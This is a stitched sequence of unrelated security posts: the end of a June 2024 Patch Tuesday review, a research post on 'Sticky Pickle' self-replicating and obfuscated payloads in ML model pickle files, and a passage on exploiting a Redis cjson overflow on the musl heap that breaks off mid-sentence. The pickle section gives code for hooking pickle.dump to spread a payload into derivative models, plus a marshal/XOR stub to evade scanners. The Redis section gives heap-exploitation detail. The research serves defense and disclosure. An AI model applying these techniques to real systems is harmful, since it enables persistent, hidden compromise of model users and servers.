| CVE-2024-29060 | Visual Studio Elevation of Privilege Vulnerability | Important | 6.7 | No | No | EoP |
| CVE-2024-30052 | Visual Studio Remote Code Execution Vulnerability | Important | 4.7 | No | No | RCE |
| CVE-2024-30082 | Win32k Elevation of Privilege Vulnerability | Important | 7.8 | No | No | EoP |
| CVE-2024-30087 | Win32k Elevation of Privilege Vulnerability | Important | 7.8 | No | No | EoP |
| CVE-2024-30091 | Win32k Elevation of Privilege Vulnerability | Important | 7.8 | No | No | EoP |
| CVE-2024-30085 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | EoP |
| CVE-2024-30076 | Windows Container Manager Service Elevation of Privilege Vulnerability | Important | 6.8 | No | No | EoP |
| CVE-2024-30096 | Windows Cryptographic Services Information Disclosure Vulnerability | Important | 5.5 | No | No | Info |
| CVE-2024-30063 | Windows Distributed File System (DFS) Remote Code Execution Vulnerability | Important | 6.7 | No | No | RCE |
| CVE-2024-30064 | Windows Kernel Elevation of Privilege Vulnerability | Important | 8.8 | No | No | EoP |
| CVE-2024-30068 | Windows Kernel Elevation of Privilege Vulnerability | Important | 8.8 | No | No | EoP |
| CVE-2024-30088 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7 | No | No | EoP |
| CVE-2024-30099 | Windows Kernel Elevation of Privilege Vulnerability | Important | 7 | No | No | EoP |
| CVE-2024-35250 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | EoP |
| CVE-2024-30084 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability | Important | 7 | No | No | EoP |
| CVE-2024-30074 | Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability | Important | 8 | No | No | RCE |
| CVE-2024-30075 | Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability | Important | 8 | No | No | RCE |
| CVE-2024-30077 | Windows OLE Remote Code Execution Vulnerability | Important | 8 | No | No | RCE |
| CVE-2024-35265 | Windows Perception Service Elevation of Privilege Vulnerability | Important | 7 | No | No | EoP |
| CVE-2024-30069 | Windows Remote Access Connection Manager Information Disclosure Vulnerability | Important | 4.7 | No | No | Info |
| CVE-2024-30094 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-30095 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-30083 | Windows Standards-Based Storage Management Service Denial of Service Vulnerability | Important | 7.5 | No | No | DoS |
| CVE-2024-30062 | Windows Standards-Based Storage Management Service Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-30093 | Windows Storage Elevation of Privilege Vulnerability | Important | 7.3 | No | No | EoP |
| CVE-2024-30065 | Windows Themes Denial of Service Vulnerability | Important | 5.5 | No | No | DoS |
| CVE-2024-30078 | Windows Wi-Fi Driver Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-30086 | Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability | Important | 7.8 | No | No | EoP |
| CVE-2024-30066 | Winlogon Elevation of Privilege Vulnerability | Important | 5.5 | No | No | EoP |
| CVE-2024-30067 | WinLogon Elevation of Privilege Vulnerability | Important | 5.5 | No | No | EoP |
| CVE-2024-5493 * | Chromium: CVE-2024-5493 Heap buffer overflow in WebRTC | High | N/A | No | No | RCE |
| CVE-2024-5494 * | Chromium: CVE-2024-5494 Use after free in Dawn | High | N/A | No | No | RCE |
| CVE-2024-5495 * | Chromium: CVE-2024-5495 Use after free in Dawn | High | N/A | No | No | RCE |
| CVE-2024-5496 * | Chromium: CVE-2024-5496 Use after free in Media Session | High | N/A | No | No | RCE |
| CVE-2024-5497 * | Chromium: CVE-2024-5497 Out of bounds memory access in Keyboard Inputs | High | N/A | No | No | RCE |
| CVE-2024-5498 * | Chromium: CVE-2024-5498 Use after free in Presentation API | High | N/A | No | No | RCE |
| CVE-2024-5499 * | Chromium: CVE-2024-5499 Out of bounds write in Streams API | High | N/A | No | No | RCE |

* Indicates this CVE had been released by a third party and is now being included in Microsoft releases.

† Indicates further administrative actions are required to fully address the vulnerability.

 

Looking at the other fixes addressing code execution bugs, there are a couple that stand out. In addition to the Wi-Fi bug above, there are two similar bugs in the Link Layer Topology Discovery Protocol with similar exploit vectors. The difference is that for these two bugs, the target needs to be running the Network Map functionality for the attack to succeed. There are several “open-and-own” type vulnerabilities getting patched. The one to look out for would be the Office bug that states, “The Preview Pane is an attack vector, but additional user interaction is required.” It’s not clear how that would manifest. The exploit for DFS requires an adjacent attacker to already be executing code on a target, which reads more like an EoP to me. The OLE bug requires connecting to a malicious SQL server. The bug in the Speech Application Programming Interface (SAPI) requires a user to click a link to connect to the attacker’s server. Lastly, the code execution bug in Dynamics 365 requires authentication, which again sounds more like an EoP, but it also states no user interaction is required. It’s an odd write-up that implies it’s unlikely to be exploited in the wild.

More than half of this month’s release corrects privilege escalation bugs, but the majority of these lead to SYSTEM-level code execution if an authenticated user runs specially crafted code. Other privilege escalation bugs would allow the attacker to get to the level of the running application. The bugs in Winlogon are somewhat intriguing as they could allow an attacker to replace valid file content with specially crafted file content. One of the kernel bugs could be used for a container escape. The bug in the Perception Service could allow elevation to the “NT AUTHORITY\LOCAL SERVICE” account. The vulnerability in Visual Studio requires an attacker to create a malicious extension. An authenticated user would then need to create a Visual Studio project that uses that extension. If they manage all of that, it would lead to admin privileges.

The bug in Azure Identity Libraries and Microsoft Authentication Library allows attackers to read any file on the target with SYSTEM privileges. The privilege escalation in Azure Monitor Agent could let attackers delete files and folders. If you’ve disabled Automatic Extension Upgrades, you’ll need to perform a manual update to ensure the Monitor Agent is at the latest version. Speaking of extra actions, the bug in the Azure Science Virtual Machine (DSVM) requires you to upgrade your DSVM to Ubuntu 20.04. If you’re not familiar with this procedure, Microsoft provides this article for guidance. Attackers who exploit this bug could gain access to user credentials, which would allow them to impersonate authorized users.

There are only three information disclosure bugs receiving fixes this month, and only one results in info leaks consisting of unspecified memory contents. The bug in the on-prem version of Dynamics 365 could allow an attacker to exfiltrate all the data accessible to the logged-on user. The vulnerability in the Cryptographic Services could disclose sensitive information such as KeyGuard (KG) keys, which are intended to be per-boot and used to protect sensitive data. An attacker could potentially use these to decrypt anything encrypted with those keys.

The final bugs for June address Denial-of-Service (DoS) vulnerabilities in Windows and Azure components. Unfortunately, Microsoft provides no additional information about these bugs and how they would manifest on affected systems. They do note the DoS in the DHCP Server does not affect those who have configured failover for their DHCP setup.

There are no new advisories in this month’s release.

Looking Ahead

The next Patch Tuesday of 2024 will be on July 9, and I’ll return with details and patch analysis then. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

Exploiting ML models with pickle file attacks: Part 2

By Boyan Milanov

In part 1, we introduced Sleepy Pickle, an attack that uses malicious pickle files to stealthily compromise ML models and carry out sophisticated attacks against end users. Here we show how this technique can be adapted to enable long-lasting presence on compromised systems while remaining undetected. This variant technique, which we call Sticky Pickle, incorporates a self-replicating mechanism that propagates its malicious payload into successive versions of the compromised model. Additionally, Sticky Pickle uses obfuscation to disguise the malicious code to prevent detection by pickle file scanners.

Making malicious pickle payloads persistent

Recall from our previous blog post that Sleepy Pickle exploits rely on injecting a malicious payload into a pickle file containing a packaged ML model. This payload is executed when the pickle file is deserialized to a Python object, compromising the model’s weights and/or associated code. If the user decides to modify the compromised model (e.g., fine-tuning) and then re-distribute it, it will be serialized in a new pickle file that the attacker does not control. This process will likely render the exploit ineffective.

To overcome this limitation, we developed Sticky Pickle, a self-replication mechanism that wraps our model-compromising payload in an encapsulating, persistent payload. The encapsulating payload performs the following actions as it executes (a minimal sketch of the hooking step follows the list):

    1. Find the original compromised pickle file being loaded on the local filesystem.
    2. Open the file and read the encapsulating payload’s bytes from disk. (The payload cannot access them directly via its own Python code.)
    3. Hide its own bytecode in the object being unpickled under a predefined attribute name.
    4. Hook the pickle.dump() function so that when an object is re-serialized, it:
      • Serializes the object using the regular pickle.dump() function.
      • Detects that the object contains the bytecode attribute.
      • Manually injects the bytecode in the new Pickle file that was just created.
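Below is a highly simplified sketch of the hooking step. The attribute name is hypothetical, and a real payload splices its opcodes into the pickle stream rather than appending bytes after it:

import functools
import pickle

PAYLOAD_ATTR = "_sticky_payload"  # hypothetical attribute name

_orig_dump = pickle.dump

@functools.wraps(_orig_dump)
def _hooked_dump(obj, file, *args, **kwargs):
    # Serialize the object with the regular pickle.dump() first.
    _orig_dump(obj, file, *args, **kwargs)
    # If the object carries stashed payload bytes, re-inject them into
    # the newly written file. (Simplified: a real implementation
    # rewrites the opcode stream so the payload runs on load.)
    payload = getattr(obj, PAYLOAD_ATTR, None)
    if payload is not None:
        file.write(payload)

pickle.dump = _hooked_dump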

Figure 1: Persistent payload in malicious ML model files

With this technique, malicious pickle payloads automatically spread to derivative models without leaving a trace on the disk outside of the infected pickle file. Moreover, the ability to hook any function in the Python interpreter allows for other attack variations as the attacker can access other local files, such as training datasets or configuration files.

Payload obfuscation: Going under the radar

Another limitation of pickle-based exploits arises from the malicious payload being injected directly as Python source code. This means that the malicious code appears in plaintext in the Pickle file. This has several drawbacks. First, it is possible to detect the attack with naive file scanning and a few heuristics that target the presence of significant chunks of raw Python within Pickle files. Second, it’s easy for security teams to identify the attack and its intent just by looking at it.

We developed a payload obfuscation and encoding method that overcomes these limitations and makes payload detection much harder. Starting with our original payload consisting of code that compromises the pickled ML model, we modify it in two ways.

First, we obfuscate the payload by compiling it into a Python code object and serializing it into a string with the marshal library. This lets us inject this serialized payload string into the pickle file, followed by a special bytecode sequence. When executed, this special sequence calls marshal.loads() on the string to reconstruct the code object of the payload and execute it. This makes the payload completely unreadable to scanners or human inspection as it is injected as compiled Python bytecode instead of source code.
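As a rough illustration of that marshal round trip (the payload source here is a harmless placeholder, not actual exploit code):

import marshal

# Placeholder payload source; the real payload compromises the model.
payload_src = "print('payload would run here')"

# Attacker side: compile to a code object and serialize it with marshal.
blob = marshal.dumps(compile(payload_src, "<payload>", "exec"))

# What the injected opcode sequence effectively does at load time:
exec(marshal.loads(blob))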

Second, we use a simple XOR encoding to vary the payload in every infected file. Instead of consisting of only the original model-compromising code, the XORed payload contains the XOR-encoded Python source of the original payload and a decoding and execution stub similar to this:

def compromise_model(model):
    # The string of the XOR-encoded Python payload source code
    # (the actual bytes are elided; XOR_KEY is filled in at injection time)
    encoded_payload = ...
    # This line decodes the payload and executes it
    exec(bytearray(b ^ 0x{XOR_KEY:X} for b in encoded_payload))
    return model

Since the obfuscation key can take any value and is hardcoded in the decoding stub, this method complements the persistence feature by allowing attackers to write a payload that generates a new obfuscation key upon reinjection in a new pickle file. This results in different Python payloads, code objects, and final pickle payloads being injected into compromised files, while the malicious behavior remains unchanged.
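For illustration, re-keying such a stub on reinjection could look like the sketch below; make_stub is a hypothetical helper, not code from the actual payload:

import secrets

def make_stub(payload_src: bytes) -> str:
    # Pick a fresh single-byte key for every reinjection so the bytes
    # on disk differ between infected files.
    key = secrets.randbelow(255) + 1
    encoded = bytes(b ^ key for b in payload_src)
    # Regenerate the decode-and-exec stub with the new key baked in.
    return (
        f"encoded_payload = {encoded!r}\n"
        f"exec(bytearray(b ^ 0x{key:X} for b in encoded_payload))\n"
    )

print(make_stub(b"print('hello')"))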

Figure 2: Obfuscation of the Python payload before injection in a pickle file

Figure 2 shows how this obfuscation method completely hides the malicious payload within the file. Automated tools or security analysts scanning the file would see only:

  1. The raw bytes of the Python payload that was compiled and then marshaled. It is difficult, if not impossible, to interpret these bytes and flag them as dangerous with static scanning.
  2. The pickle sequence that calls marshal.loads(). This is a common pattern also found in benign pickle files and thus is not sufficient to alert users about potential malicious behavior.

When a pickle file containing the obfuscated payload is loaded, the payload stages are executed in the following order, illustrated in figure 3:

  1. The malicious pickle opcodes load the raw bytes of the serialized code object, then reconstruct the Python code object using marshal.loads(), and finally execute the code object.
  2. The code object is executed and decodes the XOR-encoded Python source code of the original payload.
  3. The decoded original payload code is executed and compromises the loaded ML model.

Figure 3: Overview of execution stages of the obfuscated payload

Sealing the lid on pickle

These persistence and evasion techniques show the level of sophistication that pickle exploits can achieve. Expanding on the critical risks we demonstrated in part one of this series, we’ve seen how a single malicious pickle file can:

  • Compromise other local pickle files and ML models.
  • Evade file scanning and make manual analysis significantly harder.
  • Make its payload polymorphic and spread it under an ever-changing form while maintaining the same final stage and end goal.

While these are only examples among other possible attack improvements, persistence and evasion are critical aspects of pickle exploits that, to our knowledge, have not yet been demonstrated.

Despite the risks posed by pickle files, we acknowledge that it will be a long-term effort for major frameworks of the ML ecosystem to move away from them. In the short term, here are some action steps you can take to eliminate your exposure to these issues:

  • Avoid using pickle files to distribute serialized models.
  • Adopt safer alternatives to pickle files such as HuggingFace’s SafeTensors.
  • If you must use pickle files, scan them with our very own Fickling to detect pickle-based ML attacks.

Long-term, we are continuing our efforts to drive the ML industry to adopt secure-by-design technologies. If you want to learn more about our contributions, check out our awesome-ml-security and ml-file-formats Github repositories and our recent responsible disclosure of a critical GPU vulnerability called Leftover Locals!

Acknowledgments

Thanks to our intern Russel Tran for their hard work on pickle payload obfuscation and optimization.

Pumping Iron on the Musl Heap – Real World CVE-2022-24834 Exploitation on an Alpine mallocng Heap

This post is about exploiting CVE-2022-24834 against a Redis container running on Alpine Linux. CVE-2022-24834 is a vulnerability affecting the Lua cjson module in Redis servers <=7.0.11. The bug is an integer overflow that leads to a large copy of data, approximately 350MiB.

A colleague from NCC Group wanted to exploit this bug but found that the public exploits didn't work. This was ultimately due to those exploits being written to target Ubuntu or similar distros, which use the GNU libc library. The target in our case was Alpine 3.18, which uses musl libc 1.2.4. The important distinction here is that GNU libc uses the ptmalloc2 heap allocator, while musl 1.2.4 uses its own custom allocator called mallocng. This resulted in some interesting differences during exploitation, which I figured I would document, since there's not a lot of public information about targeting the musl heap.

I highly recommend reading Ricerca Security's original writeup, which goes into depth about the vulnerability and how they approached exploitation on ptmalloc2. Conviso Labs' exploit repository has a README.md that describes some improvements they made, which is also worth a look. There are quite a few differences between exploitation on ptmalloc2 and mallocng, which I'll explain as I go. I'll try not to repeat the details that previous research has already provided but rather focus on the parts that differed for mallocng.

Finally, I want to note that I am not attacking the musl mallocng
allocator by corrupting its metadata, but rather I’m doing Lua-specific
exploitation on the mallocng heap, mimicking the strategy done by the
original exploit.

Lua 5.1

As the previous articles covered Lua internals in detail, I won’t
repeat that information here. Redis uses Lua 5.1, so it’s important to
refer to the specific version when reading, as Lua has undergone
significant changes across different releases. These changes include
structure layouts and the garbage collection algorithm utilized.

I would like to highlight that Lua utilizes Tagged Values to
represent various internal types such as numbers and tables. The
structure is defined as follows:

/*
** Tagged Values
*/

#define TValuefields                                                           \
    Value value;                                                               \
    int   tt

typedef struct lua_TValue {
    TValuefields;
} TValue;

In this structure, tt denotes the type, and
value can either be an inline value or a pointer depending
on the associated type. In Lua, a Table serves as the
primary storage type, akin to a dictionary or list in Python. It
contains an array of TValue structures. For simple types
like integers, value is used directly. However, for more
complex types like nested tables, value acts as a pointer.
For further implementation details, please refer to Lua’s
lobject.h file or the aforementioned articles.

During debugging, I discovered the need to inspect Lua 5.1 objects.
The Alpine redis-server target did not include symbols for
the static Lua library. To address this, I compiled my own version of
Lua and filtered out all function symbols to only access the structure
definitions easily. This was achieved by identifying and stripping out
all FUNC symbols using readelf -Ws and
objcopy --strip-symbol.

Additionally, I came across the GdbLuaExtension,
which offers pretty printers and other functionalities for analyzing Lua
objects, albeit supporting version 5.3 only. I made some minor
modifications
to enable its compatibility with Lua 5.1. These
changes enabled features like pretty printers for tables, although I
didn’t conduct exhaustive testing on the required functionalities.

This method provides a clearer analysis of objects like a
Table, presenting information in a more readable format
compared to a hexdump.

(gdb) p/x *(Table *) 0x7ffff7a05100
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffaf9ef620 <lua_table^> 0x7ffff4a76322,
  [2] = (TValue *) 0x7fffaf9ef630 <lua_table^> 0x7ffff7a051a0,
  [3] = (TValue *) 0x7fffaf9ef640 <lua_table^> 0x7ffff7a051f0,
  [4] = (TValue *) 0x7fffaf9ef650 <lua_table^> 0x7ffff7a05290,
  [5] = (TValue *) 0x7fffaf9ef660 <lua_table^> 0x7ffff7a052e0,

The Table we printed shows an array of
TValue structures, and we can see that each
TValue in our table is referencing another table.

Musl's Next Generation Allocator – aka mallocng

On August 4, 2020,
musl 1.2.1 shipped a new heap algorithm called “mallocng”. This
allocator has received some good quality research in the past,
predominantly focused on CTF challenge exploitation. I didn’t find any
real-world exploitation examples, but if someone knows of some, please
let me know and I’ll update the article.

The mallocng allocator is slab-based and organizes fixed-sized
allocations (called slots) on multi-page slabs (called
groups). In general, groups are mmap()-backed.
However, groups containing small slots may be smaller than a page, in which case the group itself is just a fixed-size slot of a larger group. The fact that the allocator does not use brk() is an important detail, as we will see later. The fixed size for a given group is referred to as the group's stride.

The mallocng allocator seems to be designed with security in mind,
mixing a combination of in-band metadata that contains some cookies,
with predominantly out-of-band metadata which is stored in slots on
dedicated group mappings that are prefixed with guard pages to prevent
corruption from linear overflows.

As I’m not actually going to be exploiting the allocator internals
itself, I won’t go into too much detail about the data structures. I
advise you to read pre-existing articles, which you can find in the
resource section.

There's a useful gdb plugin called muslheap developed by xf1les, which I made a lot of use of. xf1les also has an associated blog post, which is worth reading. At the time of writing, I have a PR open to add this functionality to pwndbg, and hopefully I will have time to add some more functionality to it afterwards.

There is one particularly interesting aspect of the allocator that I
want to go over, which is that it can adjust the starting offset of
slots inside a group across subsequent allocations, using a value it
calls the cycling offset. It only does so if the overhead of a given
slot inside the fixed size has a large enough remainder such that the
offset can be adjusted. Interestingly, in this case, because the slot we
are working in is the 0x50-stride group, and the Table
structure is 0x48 bytes, this cycling offset doesn’t apply. Since I
narrowly avoided having to deal with this, and originally thought I
would have to, I’ll still take a moment to explain what the mitigation
actually is for and what it looks like in practice.

mallocng Cycling Offset

The cycling offset is a technique used to mitigate double frees,
although it can have a negative effect on other exploitation scenarios
as well. It works by adjusting the offset of the user data part of an
allocation each time a chunk is used, wrapping back to the beginning
once the offset is larger than the slack space. The offset starts at 1
and increments each time the chunk is reused.

The idea behind mitigating a double free is that if a chunk is used
and then freed, and then re-used, the offset used for the second
allocation will not be the same as the first time, due to cycling. Then,
when it is double freed, that free will detect some in-band metadata
anomaly and fail.

The allocator goes about this offset cycling by abusing the fact that
groups have fixed-sized slots, and often the user data being allocated
will not fill up the entire space of the slot, resulting in some slack
space. If the remaining slack space in the slot is large enough, which
is calculated by subtracting both the size of the user data and the
required in-line metadata, then there are actually two in-line metadata
blocks used inside a slot. One contains an offset used to indicate the
actual start of the user data, and that user data will still have some
metadata prefixed before it.

The offset calculation is done in the enframe()
function in mallocng. Basically, each time a slot is allocated, the
offset is increased, and will wrap back around when it exceeds the size
of the slack.
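As a toy model of that behavior (a simplification for intuition, not mallocng's exact arithmetic):

UNIT = 16  # mallocng works in 16-byte units

def next_offset(prev: int, slack_units: int) -> int:
    # Each reuse bumps the cycling offset by one, wrapping back to 1
    # once it would exceed the slot's slack space.
    nxt = prev + 1
    return nxt if nxt <= slack_units else 1

off = 0
for use in range(1, 6):
    off = next_offset(off, slack_units=3)
    print(f"use {use}: user data starts at slot + {off * UNIT:#x}")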

To demonstrate what the cycling offset looks like in practice, I will
focus on larger-than-Table stride groups, that have enough
slack such that the cycling offset will be used. If we review what the
stride sizes are, we see:

| sizeclass | stride | sizeclass | stride | sizeclass | stride | sizeclass | stride |
| --- | --- | --- | --- | --- | --- | --- | --- |
| 1 | 0x20 | 13 | 0x140 | 25 | 0xaa0 | 37 | 0x5540 |
| 2 | 0x30 | 14 | 0x190 | 26 | 0xcc0 | 38 | 0x6650 |
| 3 | 0x40 | 15 | 0x1f0 | 27 | 0xff0 | 39 | 0x7ff0 |
| 4 | 0x50 | 16 | 0x240 | 28 | 0x1240 | 40 | 0x9240 |
| 5 | 0x60 | 17 | 0x2a0 | 29 | 0x1540 | 41 | 0xaaa0 |
| 6 | 0x70 | 18 | 0x320 | 30 | 0x1990 | 42 | 0xccc0 |
| 7 | 0x80 | 19 | 0x3f0 | 31 | 0x1ff0 | 43 | 0xfff0 |
| 8 | 0x90 | 20 | 0x480 | 32 | 0x2480 | 44 | 0x12480 |
| 9 | 0xa0 | 21 | 0x540 | 33 | 0x2aa0 | 45 | 0x15540 |
| 10 | 0xc0 | 22 | 0x660 | 34 | 0x3320 | 46 | 0x19980 |
| 11 | 0xf0 | 23 | 0x7f0 | 35 | 0x3ff0 | 47 | 0x1fff0 |
| 12 | 0x120 | 24 | 0x920 | 36 | 0x4910 |  |  |
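To make the table concrete, here is a hedged helper that maps a requested size to its group stride by picking the smallest stride that can hold the request plus the 4-byte in-band header; this is a simplification of mallocng's real size-to-class logic:

# Strides for sizeclasses 1-47, taken from the table above.
STRIDES = [
    0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80, 0x90, 0xA0, 0xC0,
    0xF0, 0x120, 0x140, 0x190, 0x1F0, 0x240, 0x2A0, 0x320, 0x3F0,
    0x480, 0x540, 0x660, 0x7F0, 0x920, 0xAA0, 0xCC0, 0xFF0, 0x1240,
    0x1540, 0x1990, 0x1FF0, 0x2480, 0x2AA0, 0x3320, 0x3FF0, 0x4910,
    0x5540, 0x6650, 0x7FF0, 0x9240, 0xAAA0, 0xCCC0, 0xFFF0,
    0x12480, 0x15540, 0x19980, 0x1FFF0,
]

def stride_for(size: int) -> int:
    # Simplified: smallest stride that fits the request plus the
    # 4-byte in-band header; real mallocng has more placement logic.
    for stride in STRIDES:
        if size + 4 <= stride:
            return stride
    raise ValueError("request falls into the special mmap'ed sizeclass 63")

print(hex(stride_for(0x48)))  # a Lua Table struct lands in a 0x50-stride group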

Using a cycling offset requires an additional 4-byte in-band header
and also increases by UNIT-sized (16-byte) increments. As
such, I think it’s unlikely for strides <= 0xf0 to have the cycling
offset applied (though I haven’t tested each). There might be some
exceptions, like if sometimes smaller allocations are placed into larger
strides rather than always allocating a new group, but I’m not sure if
that’s possible as I haven’t spent enough time studying the allocator
yet.

In light of this understanding, for the sake of demonstrating when
cycling offsets are used, we’ll look at the 0x140 stride. I allocate a
few tables, fill their arrays such that the resulting sizes are ~0x100
bytes.

I use Lua to leak the address of an outer table. Then in gdb I
analyze the array of all the tables it references, which should be of
increasing size. Let’s look at the first inner table’s array first:

pwndbg> p/x *(Table *)  0x7ffff7a945b0
$2 = <lua_table> = {
  [1] = (TValue *) 0x7ffff7a99880 <lua_table^> 0x7ffff7a94740,
  [2] = (TValue *) 0x7ffff7a99890 <lua_table^> 0x7ffff7a93d80,
  [3] = (TValue *) 0x7ffff7a998a0 <lua_table^> 0x7ffff7a93e70,
  [4] = (TValue *) 0x7ffff7a998b0 <lua_table^> 0x7ffff7a95040,
  [5] = (TValue *) 0x7ffff7a998c0 <lua_table^> 0x7ffff7a950e0,
...
pwndbg> p/x ((Table *)  0x7ffff7a94740)->array
$4 = 0x7ffff7a94e40
pwndbg> mchunkinfo 0x7ffff7a94e40
============== IN-BAND META ==============
        INDEX : 2
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x29 (group --> 0x7ffff7a94ba0)

================= GROUP ================== (at 0x7ffff7a94ba0)
         meta : 0x555555a69040
   active_idx : 2

================== META ================== (at 0x555555a69040)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a94ba0
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]UU (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a94e30)
      cycling offset : 0x1 (userdata --> 0x7ffff7a94e40)
        nominal size : 0x100
       reserved size : 0x2c
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

The first chunk we see under the == SLOT == head has a
cycling offset of 1. We can see that the slot itself starts at
0x7ffff7a94e30, but the user data does not start at the same address,
but rather 0x10-bytes further. This is due to the cycling offset *
UNIT adjustment. If we quickly look at a Table
(stride 0x50) slot, which is of a size that doesn’t allow enough slack
to use a cycling offset, we can see the difference:

pwndbg> mchunkinfo 0x7ffff7a94740
============== IN-BAND META ==============
        INDEX : 11
     RESERVED : 4
     OVERFLOW : 0
    OFFSET_16 : 0x37 (group --> 0x7ffff7a943c0)

================= GROUP ================== (at 0x7ffff7a943c0)
         meta : 0x555555a68ea0
   active_idx : 11

================== META ================== (at 0x555555a68ea0)
         prev : 0x555555a686f8
         next : 0x555555a68d38
          mem : 0x7ffff7a943c0
     last_idx :
   avail_mask : 0x0   (0b00000000000)
   freed_mask : 0x5ac (0b10110101100)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 4 (stride: 0x50)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: [U]FUFFUFUFFUU (from slot 11 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : Do nothing

================== SLOT ================== (at 0x7ffff7a94740)
      cycling offset : 0x0 (userdata --> 0x7ffff7a94740)
        nominal size : 0x48
       reserved size : 0x4
OVERFLOW (user data) : 0
OVERFLOW (next slot) : 0

Above, we see the SLOT section indicates a cycling
offset of 0. This will hold true for all Table allocations
in a stride 0x50 group. In this case, the user data starts at the same
location as the slot.

So now let’s look at the second stride 0x140 group’s slot that we
allocated earlier:

pwndbg> p/x ((Table *)  0x7ffff7a93d80)->array
$4 = 0x7ffff7a96ca0
pwndbg> mchunkinfo 0x7ffff7a96ca0
============== IN-BAND META ==============
        INDEX : 1
     RESERVED : 5 (Use reserved in slot end)
     OVERFLOW : 0
    OFFSET_16 : 0x17 (group --> 0x7ffff7a96b20)

================= GROUP ================== (at 0x7ffff7a96b20)
         meta : 0x555555a690e0
   active_idx : 2

================== META ================== (at 0x555555a690e0)
         prev : 0x0
         next : 0x0
          mem : 0x7ffff7a96b20
     last_idx : 2
   avail_mask : 0x0 (0b0)
   freed_mask : 0x0 (0b0)
  area->check : 0x8bbd98bb29552bcc
    sizeclass : 13 (stride: 0x140)
       maplen : 0
     freeable : 1

Group allocation method : another groups slot

Slot status map: U[U]U (from slot 2 to slot 0)
 (U: Inuse / A: Available / F: Freed)

Result of nontrivial_free() : queue (active[13])

================== SLOT ================== (at 0x7ffff7a96c70)
      cycling offset : 0x3 (userdata --> 0x7ffff7a96ca0)
        nominal size : 0x100
       reserved size : 0xc
OVERFLOW (user data) : 0
OVERFLOW  (reserved) : 0
OVERFLOW (next slot) : 0

This second array has a cycling offset of 3, so it starts 0x30 bytes
further than the start of the slot. Clearly, this slot has been used a
few times already.

The main takeaways here are:

  • For certain allocation sizes, the exact offset of an overflow may be
    unreliable unless you know exactly how many times the slot has been
    allocated.
  • For a scenario like overwriting the LSB of a pointer inside of such
    a group, you could be unable to predict where the resulting pointer will
    point inside of another slot, depending on whether you know how many
    times each slot has been used.

Considering all this in the context of the exploit this article describes, I think this mitigation wouldn't have stopped us even if the structures had been in a stride group that uses cycling offsets, because we have fine-grained control over all the allocations performed for our overflow and can easily control the number of times the slots are used prior to the overflow. That said, since I originally thought it might be a problem and wanted to understand it, hopefully the explanation was still interesting.

With that out of the way, let’s look into how to exploit
CVE-2022-24834 on the musl heap.

Exploiting CVE-2022-24834 on the mallocng heap

To quickly recap the vulnerability: it's an integer overflow when calculating the size of a buffer to allocate while doing cjson encoding. By triggering the overflow, we end up with an undersized buffer that we can write 0x15555555 bytes (341 MiB) to, which may be large enough to qualify as a "wild copy," although given a 64-bit target and the amount of memory on modern systems, it's not too hard to deal with. Exploitation requires that the target buffer we want to corrupt be adjacent to the overflown buffer with no unmapped gaps in between, meaning at a minimum around 350 MiB of adjacent mappings.
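The arithmetic of the overflow can be sketched quickly. This is illustrative only, assuming the reserve expression is roughly len * 6 + 2 computed in a signed 32-bit integer (see the Ricerca Security writeup for the precise code):

# cjson reserves up to 6 output bytes per input byte (worst case
# "\uXXXX" escapes) plus the surrounding quotes, in a signed 32-bit int.
def to_i32(v: int) -> int:
    # Interpret an unbounded int as a wrapped signed 32-bit value.
    v &= 0xFFFFFFFF
    return v - (1 << 32) if v >= (1 << 31) else v

length = 0x15555555               # attacker-controlled string length
print(hex(length * 6 + 2))        # 0x80000000: exceeds INT32_MAX
print(to_i32(length * 6 + 2))     # -2147483648: the reservation wraps
# The buffer is never grown to the needed size, yet the encoder still
# writes on the order of `length` bytes past it.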

While exploiting ptmalloc2, Ricerca Security solved this problem by
extending the heap, which is brk()-based, to ensure that
enough space exists. Once the extension occurs, it won’t be shrunk
backward. This makes it easy to ensure no unmapped memory regions exist,
and that the 0x15555555-byte copy won’t hit any invalid memory.

This adjacent memory requirement poses some different problems on the
mallocng heap, which I’ll explain shortly.

After achieving the desired layout, the goal is to overwrite some target chunk (or slot, in our case) with the 0x22 value corresponding to the ending double quote. In the Ricerca Security write-up, their diagrams indicate they overwrote the LSB of a Table->array pointer; however, I believe their exploit actually overwrites the LSB of a TValue->value pointer, which lives in a chunk pointed to by Table->array. I may misunderstand their exploit, but at any rate, the latter is the approach I used.

To summarize, the goal of the heap shaping is ultimately to ensure
that the allocation associated with a table’s array, which is pointed to
by Table->array, is adjacent to the buffer we overflow
so that we corrupt the TValue.

mallocng Heap Shaping

mallocng requires a different strategy than ptmalloc2, as it does not
use brk(). Rather, it will use mmap() to
allocate groups (below I will assume that the group itself is not a slot
of another group) and populate those groups with various fixed-size
slots. Freeing the group, which may occur if all of the slots in a group
are no longer used, results in memory backing the group to be unmapped
using munmap().

 

This means we must leverage feng shui to have valid in-use
